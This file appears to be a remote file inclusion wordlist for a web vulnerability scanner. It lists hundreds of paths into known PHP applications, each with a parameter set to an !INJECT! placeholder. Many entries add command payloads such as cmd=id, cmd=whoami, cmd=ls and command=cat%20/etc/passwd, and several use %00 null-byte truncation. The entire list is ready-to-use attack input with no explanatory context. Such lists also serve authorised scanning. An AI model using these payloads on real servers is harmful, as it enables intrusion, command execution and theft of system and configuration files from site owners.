/pmapper-3.2-beta3/incphp/globals.php?_SESSION[PM_INCPHP]=!INJECT!?
/pmi_v28/Includes/global.inc.php?strIncludePrefix=!INJECT!
/pmi_v28/Includes/global.inc.php?strIncludePrefix=!INJECT!?
/podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/categories_add.php?absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/categories_remove.php?absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/editdel.php?p=admin&absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/ftpfeature.php?p=admin&absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/login.php?absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/pgRSSnews.php?absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/showcat.php?absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl=!INJECT!
/podcastgen1.0beta2/core/archive_cat.php?absoluteurl=!INJECT!
/podcastgen1.0beta2/core/archive_nocat.php?absoluteurl=!INJECT!
/podcastgen1.0beta2/core/recent_list.php?absoluteurl=!INJECT!
/poll/view.php?int_path=!INJECT!
/pollvote.php?pollname=!INJECT!?&cmd=ls
/pop.php?base=!INJECT!
/popup_window.php?site_isp_root=!INJECT!?
/port.php?content=!INJECT!
/portal/includes/portal_block.php?phpbb_root_path=!INJECT!
/portal/portal.php?phpbb_root_path=!INJECT!?
/portfolio.php?id=!INJECT!
/portfolio/commentaires/derniers_commentaires.php?rep=!INJECT!?
/post_static_0-11/_lib/fckeditor/upload_config.php?DDS=!INJECT!
/prepare.php?xcart_dir=!INJECT!?
/prepend.php?_PX_config[manager_path]=!INJECT!
/preview.php?php_script_path=!INJECT!?&cmd=dir
/principal.php?conteudo=!INJECT!
/print.php?page=!INJECT!
/print.php?pager=!INJECT!
/print.php?print=!INJECT!?
/process.php?DEFAULT_SKIN=!INJECT!
/professeurs/index.php?repertoire_config=!INJECT!
/profil.php?config[root_ordner]=!INJECT!?&cmd=id
/projects/weatimages/demo/index.php?ini[langpack]=!INJECT!
/promocms/newspublish/include.php?path[bdocroot]=!INJECT!
/protection.php?logout_page=!INJECT!?
/provider/auth.php?xcart_dir=!INJECT!?
/psynch/nph-psa.exe?css=!INJECT!
/psynch/nph-psf.exe?css=!INJECT!
/public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER=!INJECT!?
/public_html/modules/Forums/favorites.php?nuke_bb_root_path=!INJECT!?
/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=!INJECT!
/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=!INJECT!
/qsgen_0.7.2c/qlib/smarty.inc.php?CONFIG[gameroot]=!INJECT!?
/qsgen_0.7.2c/server_request.php?CONFIG[gameroot]=!INJECT!?
/qte_web.php?qte_web_path=!INJECT!?
/quick_reply.php?phpbb_root_path=!INJECT!&mode=[file]
/quickie.php?QUICK_PATH=!INJECT!?&cmd=id
/random2.php?path_to_folder=!INJECT!
/randshop/index.php?incl=!INJECT!?
/rdf.php?page[path]=!INJECT!?&cmd=ls
/reactivate.php?base_dir=!INJECT!
/read.php?data=!INJECT!?
/readmore.php?config["sipssys"]=!INJECT!
/recent.php?insPath=!INJECT!
/rechnung.php?_PHPLIB[libdir]=!INJECT!?
/reconfig.php?GLOBALS[CLPath]=!INJECT!
/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=!INJECT!
/redirect.php?url=!INJECT!
/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=!INJECT!
/register.php?base_dir=!INJECT!
/releasenote.php?mosConfig_absolute_path=!INJECT!
/rempass.php?lang=!INJECT!
/report.php?scriptpath=!INJECT!?
/reports/who_r.php?bj=!INJECT!
/resources/includes/class.Smarty.php?cfg[sys][base_path]=!INJECT!
/ressourcen/dbopen.php?home=!INJECT!?
/robotstats.inc.php?DOCUMENT_ROOT=!INJECT!?
/root/public/code/cp_html2txt.php?page=!INJECT!
/routines/fieldValidation.php?jssShopFileSystem=!INJECT!
/rspa/framework/Controller_v4.php?__ClassPath=!INJECT!
/rspa/framework/Controller_v4.php?__ClassPath=!INJECT!?
/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=!INJECT!
/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=!INJECT!?
/rss.php?page[path]=!INJECT!?&cmd=ls
/rss.php?phpraid_dir=!INJECT!
/rss.php?premodDir=!INJECT!
/rss2.php?page[path]=!INJECT!?&cmd=ls
/run.php?dir=SHELL?&file=!INJECT!
/s01.php?shopid=!INJECT!
/s01.php?shopid=!INJECT!?
/s02.php?shopid=!INJECT!?
/s03.php?shopid=!INJECT!?
/s04.php?shopid=!INJECT!?
/sablonlar/gunaysoft/gunaysoft.php?icerikyolu=!INJECT!
/sablonlar/gunaysoft/gunaysoft.php?sayfaid=!INJECT!
/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=!INJECT!
/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=!INJECT!?
/sample/xls2mysql/parser_path=!INJECT!?
/save.php?file_save=!INJECT!
/saveserver.php?thisdir=!INJECT!
/script//ident/index.php?path_inc=!INJECT!
/script/_conf/core/common-tpl-vars.php?confdir=!INJECT!?
/script/common.inc.php?path_inc=!INJECT!
/script/gestion/index.php?path_inc=!INJECT!
/script/ident/disconnect.php?path_inc=!INJECT!
/script/ident/ident.inc.php?path_inc=!INJECT!
/script/ident/identification.php?path_inc=!INJECT!
/script/ident/loginliste.php?path_inc=!INJECT!
/script/ident/loginmodif.php?path_inc=!INJECT!
/script/index.php?path_inc=!INJECT!
/script/init/createallimagecache.php?PATH_TO_CODE=!INJECT!
/script/menu/menuadministration.php?path_inc=!INJECT!
/script/menu/menuprincipal.php?path_inc=!INJECT!
/script/param/param.inc.php?path_inc=!INJECT!
/script/plugins/phpgacl/admin/index.php?path_inc=!INJECT!
/script/template/index.php?main_page_directory=!INJECT!
/script/tick/allincludefortick.php?PATH_TO_CODE=!INJECT!
/script/tick/test.php?PATH_TO_CODE=!INJECT!
/script_path/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=!INJECT!?
/script_path/cms/classes/openengine/filepool.php?oe_classpath=!INJECT!?
/script_path/installation/index.php?mosConfig_absolute_path=!INJECT!?
/script_path/pgvnuke/pgvindex.php?DOCUMENT_ROOT/header.php=!INJECT!
/scripts/check-lom.php?ETCDIR=!INJECT!
/scripts/gallery.scr.php?GLOBALS[PTH][func]=!INJECT!?
/scripts/lom_update.php?ETCDIR=!INJECT!
/scripts/news.scr.php?GLOBALS[PTH][classes]=!INJECT!?
/scripts/polls.scr.php?GLOBALS[PTH][classes]=!INJECT!?
/scripts/rss.scr.php?GLOBALS[PTH][classes]=!INJECT!?
/scripts/search.scr.php?GLOBALS[PTH][classes]=!INJECT!?
/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=!INJECT!
/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=!INJECT!?
/scripts/weigh_keywords.php?ETCDIR=!INJECT!
/scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=!INJECT!?
/search.php?config["sipssys"]=!INJECT!
/search.php?id=!INJECT!
/search.php?insPath=!INJECT!
/search/submit.php?config["sipssys"]=!INJECT!
/search_wA.php?LIBPATH=!INJECT!
/searchbot.php?path=!INJECT!
/security/include/_class.security.php?PHPSECURITYADMIN_PATH=!INJECT!
/sendstudio/admin/includes/createemails.inc.php?ROOTDIR=!INJECT!?
/sendstudio/admin/includes/send_emails.inc.php?ROOTDIR=!INJECT!?
/senetman/html/index.php?page=!INJECT!
/services.php?page=!INJECT!
/services/samples/inclusionService.php?CabronServiceFolder=!INJECT!%00
/settings.php?P[includes]=!INJECT!
/settings_sql.php?path=!INJECT!
/setup/inc/database.php?tcms_administer_site=!INJECT!
/setup/upgrader.php?RootDirectory=!INJECT!
/sezhoo/SezHooTabsAndActions.php?IP=!INJECT!
/shop/includes/header.inc.php?dateiPfad=!INJECT!
/shop/index.php?action=!INJECT!?&cmd=cat%20config.php
/shop/page.php?osCsid=!INJECT!?
/shop/page.php?pageid=!INJECT!?
/shoutbox.php?language=!INJECT!
/shoutbox.php?root=!INJECT!?cmd=id
/show.php?file=!INJECT!
/show.php?id=!INJECT!
/show.php?page=!INJECT!
/show.php?path=!INJECT!
/show_archives.php?cutepath=!INJECT!?
/sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=!INJECT!
/sid=!INJECT!
/signer/final.php?smiley=!INJECT!?
/signin.php?sent=1&AMG_serverpath=!INJECT!
/sinagb.php?fuss=!INJECT!
/sinapis.php?fuss=!INJECT!
/sitebar/Integrator.php?file=!INJECT!
/sitebar/index.php?writerFile=!INJECT!
/sitebuilder/admin/top.php?admindir=!INJECT!
/sitemap.xml.php?dir[classes]=!INJECT!
/skin/board/default/doctype.php?dir=!INJECT!
/skin/dark/template.php?path=!INJECT!
/skin/gold/template.php?path=!INJECT!
/skin/html/table.php?pachtofile=!INJECT!
/skin/original/template.php?path=!INJECT!
/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=!INJECT!
/skins/advanced/advanced1.php?pluginpath[0]=!INJECT!
/skins/default.php?dir_inc=!INJECT!
/skins/header.php?ote_home=!INJECT!
/skins/phpchess/layout_admin_cfg.php?Root_Path=!INJECT!
/skins/phpchess/layout_cfg.php?Root_Path=!INJECT!
/skins/phpchess/layout_t_top.php?Root_Path=!INJECT!
/skysilver/login.tpl.php?theme=!INJECT!?
/slogin_lib.inc.php?slogin_path=!INJECT!?
/smarty.php?xcart_dir=!INJECT!?
/smarty/smarty_class.php?_smarty_compile_path=!INJECT!
/smilies.php?config=!INJECT!
/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=!INJECT!?
/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=!INJECT!?
/snort/base_stat_common.php?BASE_path=!INJECT!
/social_game_play.php?path=!INJECT!?
/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=!INJECT!
/song.php?phpbb_root_path=!INJECT!
/source.php?bibtexrootrel=!INJECT!?
/source/mod/rss/channeledit.php?Codebase=!INJECT!
/source/mod/rss/post.php?Codebase=!INJECT!
/source/mod/rss/view.php?Codebase=!INJECT!
/source/mod/rss/viewitem.php?Codebase=!INJECT!
/sources/Admin/admin_cats.php?CONFIG[main_path]=!INJECT!
/sources/Admin/admin_edit.php?CONFIG[main_path]=!INJECT!
/sources/Admin/admin_import.php?CONFIG[main_path]=!INJECT!
/sources/Admin/admin_templates.php?CONFIG[main_path]=!INJECT!
/sources/functions.php?CONFIG[main_path]=!INJECT!
/sources/help.php?CONFIG[main_path]=!INJECT!
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=!INJECT!
/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=!INJECT!
/sources/mail.php?CONFIG[main_path]=!INJECT!
/sources/misc/new_day.php?path=!INJECT!
/sources/news.php?CONFIG[main_path]=!INJECT!
/sources/post.php?fil_config=!INJECT!
/sources/template.php?CONFIG[main_path]=!INJECT!
/sources/tourney/index.php?page=!INJECT!?
/spaw/spaw_control.class.php?GLOBALS[spaw_root]=!INJECT!
/spaw/spaw_control.class.php?spaw_root=!INJECT!
/speedberg/include/entrancePage.tpl.php?SPEEDBERG_PATH=!INJECT!
/speedberg/include/generalToolBox.tlb.php?SPEEDBERG_PATH=!INJECT!
/speedberg/include/myToolBox.tlb.php?SPEEDBERG_PATH=!INJECT!
/speedberg/include/scriplet.inc.php?SPEEDBERG_PATH=!INJECT!
/speedberg/include/simplePage.tpl.php?SPEEDBERG_PATH=!INJECT!
/speedberg/include/speedberg.class.php?SPEEDBERG_PATH=!INJECT!
/speedberg/include/standardPage.tpl.php?SPEEDBERG_PATH=!INJECT!
/spellcheckwindowframeset.php?SpellIncPath=!INJECT!
/squirrelcart/cart_content.php?cart_isp_root=!INJECT!
/src/ark_inc.php?cfg_pear_path=!INJECT!?
/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=!INJECT!
/src/scripture.php?pageHeaderFile=!INJECT!?
/starnet/themes/c-sky/main.inc.php?cmsdir=!INJECT!?
/start.php?lang=!INJECT!
/start.php?pg=!INJECT!
/stat_modules/users_age/module.php?phpbb_root_path=!INJECT!
/stats.php?vwar_root=!INJECT!
/stphpapplication.php?STPHPLIB_DIR=!INJECT!
/stphpbtnimage.php?STPHPLIB_DIR=!INJECT!
/stphpform.php?STPHPLIB_DIR=!INJECT!
/str.php?p=!INJECT!
/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=!INJECT!
/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=!INJECT!?
/strload.php?LangFile=!INJECT!
/studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls%20-al&ABSOLUTE_PATH_STUDIP=!INJECT!?
/studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls%20-al&_PHPLIB[libdir]=!INJECT!?
/styles.php?toroot=!INJECT!
/styles/default/global_header.php?installed=23&domain=!INJECT!
/submit_abuse.php?path_prefix=!INJECT!
/submit_comment.php?path_prefix=!INJECT!
/subscp.php?phpbb_root_path=!INJECT!?
/suite/index.php?pg=!INJECT!?
/supasite/admin_auth_cookies.php?supa[db_path]=!INJECT!
/supasite/admin_mods.php?supa[db_path]=!INJECT!
/supasite/admin_news.php?supa[db_path]=!INJECT!
/supasite/admin_settings.php?supa[include_path]=!INJECT!
/supasite/admin_topics.php?supa[db_path]=!INJECT!
/supasite/admin_users.php?supa[db_path]=!INJECT!
/supasite/admin_utilities.php?supa[db_path]=!INJECT!
/supasite/backend_site.php?supa[include_path]=!INJECT!
/supasite/common_functions.php?supa[db_path]=!INJECT!
/supasite/site_comment.php?supa[db_path]=!INJECT!
/supasite/site_news.php?supa[db_path]=!INJECT!
/support/include/open_form.php?include_dir=!INJECT!?cmd=pwd
/support/index.php?main=!INJECT!
/surveys/survey.inc.php?path=!INJECT!
/sw/lib_comment/comment.php?doc_directory=!INJECT!?
/sw/lib_find/find.php?doc_directory=!INJECT!?
/sw/lib_session/session.php?doc_directory=!INJECT!?
/sw/lib_up_file/file.php?doc_directory=!INJECT!?
/sw/lib_up_file/find_file.php?doc_directory=!INJECT!?
/sw/lib_user/find_user.php?doc_directory=!INJECT!?
/sw/lib_user/user.php?doc_directory=!INJECT!?
/sys/code/box.inc.php?config["sipssys"]=!INJECT!
/system/ImageImageMagick.php?glConf[path_system]=!INJECT!?
/system/_b/contentFiles/gBIndex.php?gBRootPath=!INJECT!?
/system/admin/include/item_main.php?GLOBALS=!INJECT!
/system/admin/include/upload_form.php?GLOBALS=!INJECT!
/system/command/admin.cmd.php?GLOBALS=!INJECT!
/system/command/download.cmd.php?GLOBALS=!INJECT!
/system/funcs/xkurl.php?PEARPATH=!INJECT!
/system/includes/pageheaderdefault.inc.php?_sysSessionPath=!INJECT!
/system/login.php?site_path=!INJECT!
/tagit2b/tagmin/delTagUser.php?configpath=!INJECT!?
/tags.php?BBCodeFile=!INJECT!
/taxonservice.php?dir=!INJECT!?
/teatro/pub/pub08_comments.php?basePath=!INJECT!
/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=!INJECT!?
/template.php?actionsPage=!INJECT!?
/template.php?blog_theme=!INJECT!
/template.php?pagina=!INJECT!
/template/Noir/index.php?site_path=!INJECT!
/template/Vert/index.php?pageAll=!INJECT!
/template/Vert/index.php?site_path=!INJECT!
/template/barnraiser_01/p_new_password.tpl.php?templatePath=!INJECT!
/template/default/footer.php?ROOT_PATH=!INJECT!?cmd=ls
/template/default/test/header.php?ROOT_PATH=!INJECT!?cmd=ls
/template/gwb/user_bottom.php?config[template_path]=!INJECT!
/template/purpletech/base_include.php?page=!INJECT!?
/template/rwb/user_bottom.php?config[template_path]=!INJECT!
/template_csv.php?rInfo[content]=!INJECT!
/templates/2blue/bodyTemplate.php?serverPath=!INJECT!?
/templates/Official/part_userprofile.php?template_path=!INJECT!
/templates/barrel/template.tpl.php?renderer=!INJECT!
/templates/barrel/template.tpl.php?renderer=!INJECT!?
/templates/barry/template.tpl.php?renderer=!INJECT!
/templates/be2004-2/index.php?mosConfig_absolute_path=!INJECT!
/templates/datumVonDatumBis.inc.php?root=!INJECT!
/templates/default/header.inc.php?menu=!INJECT!
/templates/default/index_logged.php?main_loaded=1&cur_module=!INJECT!
/templates/default/tpl_message.php?right_file=!INJECT!
/templates/footer.inc.php?root=!INJECT!
/templates/header.inc.php?root=!INJECT!
/templates/mylook/template.tpl.php?renderer=!INJECT!
/templates/oerdec/template.tpl.php?renderer=!INJECT!
/templates/pb/language/lang_nl.php?temppath=!INJECT!
/templates/penguin/template.tpl.php?renderer=!INJECT!
/templates/sidebar/template.tpl.php?renderer=!INJECT!
/templates/slashdot/template.tpl.php?renderer=!INJECT!
/templates/stylesheets.php?root=!INJECT!
/templates/text-only/template.tpl.php?renderer=!INJECT!
/templates/tmpl_dfl/scripts/index.php?dir[inc]=!INJECT!
/theme/breadcrumb.php?rootBase=!INJECT!?
/theme/default.php?root=!INJECT!
/theme/format.php?_page_content=!INJECT!?
/theme/format.php?_page_css=!INJECT!?
/theme/frames1.php?root=!INJECT!
/theme/frames1_center.php?root=!INJECT!
/theme/frames1_left.php?root=!INJECT!
/theme/frames1_top.php?root=!INJECT!
/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=!INJECT!
/theme/settings.php?pfad_z=!INJECT!
/theme/test1.php?root=!INJECT!
/theme/test2.php?root=!INJECT!
/theme/test3.php?root=!INJECT!
/theme/test4.php?root=!INJECT!
/theme/test5.php?root=!INJECT!
/theme/test6.php?root=!INJECT!
/themes.php?GLOBALS[theme_path]=!INJECT!?
/themes/blackorange.php?root=!INJECT!
/themes/container.php?theme_directory=!INJECT!%00
/themes/default/layouts/standard.php?page_include=!INJECT!?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
/themes/default/preview_post_completo.php?dir=!INJECT!
/themes/header.php?theme_directory=!INJECT!%00
/themes/ubb/login.php?theme=!INJECT!
/themes/ubb/login.php?theme=!INJECT!?
/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=!INJECT!
/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=!INJECT!
/timedifference.php?la=!INJECT!
/toolbar.loudmouth.php?mainframe=!INJECT!
/tools/update_translations.php?_SESSION[path]=!INJECT!?
/top.php?laypath=!INJECT!
/toplist.php?f=toplist_top10&phpbb_root_path=!INJECT!
/topsites/index.php?page=!INJECT!?&
/towels-0.1/src/scripture.php?pageHeaderFile=!INJECT!
/track.php?path=!INJECT!
/tsep/include/colorswitch.php?tsep_config[absPath]=!INJECT!?
/ttCMS_path/lib/db/ez_sql.php?lib_path=!INJECT!
/twebs/modules/misc/usermods.php?ROOT=!INJECT!
/ubbt.inc.php?GLOBALS[thispath]=!INJECT!?
/unavailable.php?bibtexrootrel=!INJECT!?
/unsubs.php?scdir=!INJECT!
/up.php?my[root]=!INJECT!
/upload.php?save_path=!INJECT!?
/upload/admin/frontpage_right.php?loadadminpage=!INJECT!?
/upload/top.php?maindir=!INJECT!?
/upload/xax/admin/modules/install_module.php?level=!INJECT!?
/upload/xax/admin/patch/index.php?level=!INJECT!?
/upload/xax/ossigeno/admin/install_module.php?level=!INJECT!?
/upload/xax/ossigeno/admin/uninstall_module.php?level=!INJECT!?
/upload_local.php?target=!INJECT!?
/upload_multi.php?target=!INJECT!?
/urlinn_includes/config.php?dir_ws=!INJECT!?
/user.php?caselist[bad_file.txt][path]=!INJECT!&command=cat%20/etc/passwd
/user_language.php?INDM=r3d.w0rm&language_dir=!INJECT!?
/user_new_2.php?home=!INJECT!
/usr/extensions/get_calendar.inc.php?root_path=!INJECT!
/usr/extensions/get_infochannel.inc.php?root_path=!INJECT!?cmd=id;pwd
/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=!INJECT!
/utilitaires/gestion_sondage.php?repertoire_visiteur=!INJECT!
/utils/class_HTTPRetriever.php?libcurlemuinc=!INJECT!
/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=!INJECT!
/vCard/admin/define.inc.php?match=!INJECT!?&cmd=id
/vb/includes/functions.php?classfile=!INJECT!
/vb/includes/functions_cron.php?nextitem=!INJECT!
/vb/includes/functions_forumdisplay.php?specialtemplates=!INJECT!
/vbgsitemap/vbgsitemap-config.php?base=!INJECT!
/vbgsitemap/vbgsitemap-vbseo.php?base=!INJECT!
/vedit/editor/edit_htmlarea.php?highlighter=!INJECT!?
/viart_cms-3.3.2/blocks/block_site_map.php?root_folder_path=!INJECT!?
/view.php?ariadne=!INJECT!?
/view.php?id=!INJECT!
/view_func.php?i=!INJECT!&l=testfile.txt?
/views/print/printbar.php?views_path=!INJECT!
/visible_count_inc.php?statitpath=!INJECT!
/visitor.php?_SERVER[DOCUMENT_ROOT]=!INJECT!??
/volume.php?config[public_dir]=!INJECT!?
/vote.php?Madoa=!INJECT!?
/votebox.php?VoteBoxPath=!INJECT!
/vp/configure.php?phpbb_root_path=!INJECT!?
/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=!INJECT!
/w-agora_path/add_user.php?bn_dir_default=!INJECT!?
/w-agora_path/create_forum.php?bn_dir_default=!INJECT!?
/w-agora_path/create_user.php?bn_dir_default=!INJECT!?
/w-agora_path/delete_notes.php?bn_dir_default=!INJECT!?
/w-agora_path/delete_user.php?bn_dir_default=!INJECT!?
/w-agora_path/edit_forum.php?bn_dir_default=!INJECT!?
/w-agora_path/mail_users.php?bn_dir_default=!INJECT!?
/w-agora_path/moderate_notes.php?bn_dir_default=!INJECT!?
/w-agora_path/reorder_forums.php?bn_dir_default=!INJECT!?
/wamp_dir/setup/yesno.phtml?no_url=!INJECT!?
/wapchat/src/eng.adCreate.php?sysFileDir=!INJECT!
/wapchat/src/eng.adCreateSave.php?sysFileDir=!INJECT!
/wapchat/src/eng.adDispByTypeOptions.php?sysFileDir=!INJECT!
/wapchat/src/eng.createRoom.php?sysFileDir=!INJECT!
/wapchat/src/eng.forward.php?sysFileDir=!INJECT!
/wapchat/src/eng.pageLogout.php?sysFileDir=!INJECT!
/wapchat/src/eng.resultMember.php?sysFileDir=!INJECT!
/wapchat/src/eng.roomDeleteConfirm.php?sysFileDir=!INJECT!
/wapchat/src/eng.saveNewRoom.php?sysFileDir=!INJECT!
/wapchat/src/eng.searchMember.php?sysFileDir=!INJECT!
/wapchat/src/eng.writeMsg.php?sysFileDir=!INJECT!
/war.php?vwar_root=!INJECT!
/warn.php?file=!INJECT!
/watermark.php?GALLERY_BASEDIR=!INJECT!
/wbxml/WBXML/Decoder.php?base_dir=!INJECT!
/wbxml/WBXML/Encoder.php?base_dir=!INJECT!
/web/Administration/Includes/configureText.php?path_prefix=!INJECT!
/web/Administration/Includes/contentHome.php?path_prefix=!INJECT!
/web/Administration/Includes/deleteContent.php?path_prefix=!INJECT!
/web/Administration/Includes/deleteUser.php?path_prefix=!INJECT!
/web/Administration/Includes/userHome.php?path_prefix=!INJECT!
/web/BetaBlockModules//Module/Module.php?path_prefix=!INJECT!
/web/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path!INJECT!
/web/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=!INJECT!
/web/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=!INJECT!
/web/BetaBlockModules/EditProfileModule/external.php?path_prefix=!INJECT!
/web/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix!INJECT!
/web/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path!INJECT!
/web/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=!INJECT!
/web/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path!INJECT!
/web/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/MyNetworksModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path!INJECT!
/web/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path!INJECT!
/web/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path!INJECT!
/web/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=!INJECT!
/web/Flickrclient.php?path_prefix=!INJECT!
/web/help.php?LIBSDIR=!INJECT!
/web/includes/blogger.php?path_prefix=!INJECT!
/web/includes/functions/auto_email_notify.php?path_prefix=!INJECT!
/web/includes/functions/html_generate.php?path_prefix=!INJECT!
/web/includes/functions/validations.php?path_prefix=!INJECT!
/web/index.php?LIBSDIR=!INJECT!
/web/lib/xml/oai/ListRecords.php?xml_dir=!INJECT!
/web/login.php?LIBSDIR=!INJECT!
/web/logout.php?LIBSDIR=!INJECT!
/web/lom.php?ETCDIR=!INJECT!
/web/network_module_selector.php?path_prefix=!INJECT!
/web/submit_abuse.php?path_prefix=!INJECT!
